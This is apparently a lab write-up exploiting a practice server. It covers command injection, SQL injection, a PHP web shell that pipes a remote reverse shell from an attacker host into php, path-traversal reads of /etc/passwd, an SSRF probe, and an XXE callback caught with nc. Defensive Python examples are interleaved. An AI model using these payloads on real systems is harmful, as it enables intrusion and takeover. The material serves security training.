Questions

Exploit the command injection vulnerability of the target to execute an "id" command. Submit the privileges under which the server is running as your answer. Answer options (without quotation marks): "user", "www-data", "root"

http://10.129.100.72:3003/ping-server.php/system/id
uid=0(root) gid=0(root) groups=0(root) 

To execute commands featuring arguments via http://:3003/ping-server.php/system/{cmd} you may have to use ______. Answer options (without quotation marks): "Encryption", "Hashing", "URL Encoding"

URL encoding
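Added example (not part of the lab or its ping-server.php): the defensive counterpart to the injection above. A ping endpoint stays safe when the target is validated as an IP literal or plain hostname and handed to the process as a separate argv element, so `; id` or `%20|%20id` can never reach a shell. Names and the ping options are assumptions.

```python
import ipaddress
import re
import subprocess
from typing import List, Optional

# RFC 1123-shaped hostname: dot-separated labels of letters, digits and
# hyphens, no leading/trailing hyphen, no spaces or shell metacharacters.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def is_valid_target(target: str) -> bool:
    """Accept only an IP address literal or a plain hostname."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.match(target) is not None


def build_ping_argv(target: str) -> Optional[List[str]]:
    """Return the argument vector for ping, or None for an unsafe target.

    The vector is passed to subprocess without shell=True, so the target is
    a single argv entry and is never parsed by /bin/sh. The hostname regex
    also rejects a leading '-', so the value cannot become a ping option.
    """
    if not is_valid_target(target):
        return None
    return ["ping", "-c", "1", target]


def ping(target: str) -> str:
    """Run a single ping and return its stdout, or a fixed error string."""
    argv = build_ping_argv(target)
    if argv is None:
        return "invalid target"
    result = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return result.stdout
```

`ping()` is the handler a web route would call; the tests only exercise the validation and argv construction so nothing is executed on the host.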

What is the username of the third user (id=3)?

└─$ curl http://10.129.100.72:3003/?id=3
[{"id":"3","username":"WebServices","position":"3"}]

Identify the username of the user that has a position of 736373 through SQLi. Submit it as your answer.

http://10.129.100.72:3003/?id=1%20or%201=1%20--%20true
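Added example (not the lab's code): the `?id=1 or 1=1 -- true` payload above against a string-concatenated query and against the same query with parameter binding, on a constructed in-memory SQLite table. The table contents and column names are assumptions; the point is that the bound version returns nothing for the payload because the whole string is compared as data, not parsed as SQL.

```python
import sqlite3

# Constructed sample rows; the real table layout is not known.
SAMPLE_ROWS = [(1, "admin", "1"), (2, "Sales", "2"), (3, "WebServices", "3")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, position TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str):
    """String concatenation: the request parameter becomes part of the SQL grammar."""
    query = "SELECT id, username FROM users WHERE id = " + user_id
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str):
    """Parameter binding: the value travels separately and can only ever be data."""
    return conn.execute(
        "SELECT id, username FROM users WHERE id = ?", (user_id,)
    ).fetchall()
```

Comparing the two: the vulnerable lookup with the payload returns every row, the safe lookup returns an empty list, and both return the single `WebServices` row for a plain `3`.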

Achieve remote code execution and submit the server's hostname as your answer.

upload shell.php
http://10.129.100.72:3001/uploads/shell.php?cmd=id
Shelluid=0(root) gid=0(root) groups=0(root) 
http://10.129.100.72:3001/uploads/shell.php?cmd=curl%20http://10.10.14.15/php-reverse-shell.php|php
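Added example (not the lab's upload handler): a server-side check that would have refused `shell.php`. Only a small allowlist of extensions is accepted, the file header must match that extension, and the stored name is chosen by the server so the client cannot pick a path like `/uploads/shell.php`. The allowlist and magic bytes are assumptions for the example.

```python
import os
import secrets
from typing import Optional

# Allowed extension -> leading bytes the content must start with (assumed set).
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def safe_upload_name(client_filename: str, content: bytes) -> Optional[str]:
    """Return a server-chosen filename if the upload passes, otherwise None.

    Only the final extension is considered and it is lowercased, so
    'shell.php', 'shell.PHP' and 'image.png.php' are all rejected, and a
    '.png' whose bytes are PHP source is rejected by the header check.
    """
    ext = os.path.splitext(os.path.basename(client_filename))[1].lower()
    magic = ALLOWED_TYPES.get(ext)
    if magic is None or not content.startswith(magic):
        return None
    # Random name: the attacker cannot predict or reuse the stored path.
    return secrets.token_hex(16) + ext
```

The second half of the control is configuration rather than code: the upload directory must not be served with script execution enabled, so even a file that slips through is returned as bytes and never run.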

LFI

ffuf -w "SecLists-master/Discovery/Web-Content/common-api-endpoints-mazen160.txt" -u 'http://10.129.100.72:3000/api/FUZZ'

[Status: 200, Size: 71, Words: 5, Lines: 1, Duration: 295ms]
    * FUZZ: download

http://10.129.100.72:3000/api/download

curl "http://10.129.100.72:3000/api/download/..%2f..%2f..%2f..%2fetc%2fhosts"
curl "http://10.129.100.72:3000/api/download/..%2f..%2f..%2f..%2fetc%2fpasswd"

Through the LFI vulnerability identify an existing user on the server whose name starts with "ub". Answer format: ub****

ubuntu

SSRF:

Can you leverage the SSRF vulnerability to identify port 3002 listening locally on the web server? Answer format: Yes, No

curl http://10.129.202.133:3000/api/userinfo
curl "http://10.129.100.72:3000/api/userinfo?id=http://127.0.0.1:3002"
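Added example (not the lab's `/api/userinfo` code): the check a server should apply before fetching a URL taken from a request parameter. Named hosts must be on an allowlist, IP literals are refused outright, and a separate helper classifies loopback, private and link-local addresses so the same test can be applied to the resolved address at connect time. The allowlist entry is a hypothetical upstream.

```python
import ipaddress
from typing import Iterable
from urllib.parse import urlsplit

# Hypothetical allowlist of upstream services this server is meant to call.
ALLOWED_HOSTS = {"api.example.org"}


def is_internal_address(ip: str) -> bool:
    """True for loopback, RFC 1918, link-local, multicast, reserved or unspecified."""
    addr = ipaddress.ip_address(ip)
    return (
        addr.is_loopback or addr.is_private or addr.is_link_local
        or addr.is_multicast or addr.is_reserved or addr.is_unspecified
    )


def is_safe_fetch_target(url: str, allowed_hosts: Iterable[str] = ALLOWED_HOSTS) -> bool:
    """Allow only http(s) URLs whose host is a named entry on the allowlist."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname
    try:
        ipaddress.ip_address(host)
    except ValueError:
        # A name: accept only if it is on the allowlist.
        return host.lower() in {h.lower() for h in allowed_hosts}
    # An IP literal such as 127.0.0.1 or [::1] is never accepted.
    return False
```

`is_internal_address()` is the piece to reuse after DNS resolution: an allowlisted name that resolves to an internal range (DNS rebinding) should be refused at that point too.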

XXE Injection via API calls

POST /api/login/ HTTP/1.1
Host: 10.129.100.72:3001
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 175
Origin: http://10.129.100.72:3001
Connection: close
Referer: http://10.129.100.72:3001/

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pwn [<!ENTITY somename SYSTEM "http://10.10.14.15:8000"> ]>
<root><email>&somename;</email><password>admin</password></root>

nc -nlvp 8000
listening on [any] 8000 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.100.72] 60398
GET / HTTP/1.0
Host: 10.10.14.15:8000
Connection: close
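Added example (not the lab's `/api/login` handler): a guard that rejects the request body above before any XML parser sees it. Any `<!DOCTYPE` or `<!ENTITY` declaration is refused, so an external entity can never be declared, let alone fetched. The sample body is a constructed copy of the request shown above with the callback host replaced by a placeholder.

```python
import re
import xml.etree.ElementTree as ET
from typing import Optional

# Constructed copy of the request body above; callback host is a placeholder.
XXE_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE pwn [<!ENTITY somename SYSTEM "http://callback.example:8000"> ]>\n'
    "<root><email>&somename;</email><password>admin</password></root>"
)

# Constructed benign login body of the same shape.
PLAIN_BODY = "<root><email>user@example.org</email><password>hunter2</password></root>"

_DTD_RE = re.compile(r"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def has_dtd(body: str) -> bool:
    """True if the document declares a DTD or an entity anywhere."""
    return _DTD_RE.search(body) is not None


def parse_login(body: str) -> Optional[dict]:
    """Return the email/password fields, or None if the body carries a DTD."""
    if has_dtd(body):
        return None
    root = ET.fromstring(body)
    return {"email": root.findtext("email"), "password": root.findtext("password")}
```

The same `has_dtd()` check works as a detection rule over captured request bodies: any login body that matches is worth an alert, since a legitimate client has no reason to send a DOCTYPE.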
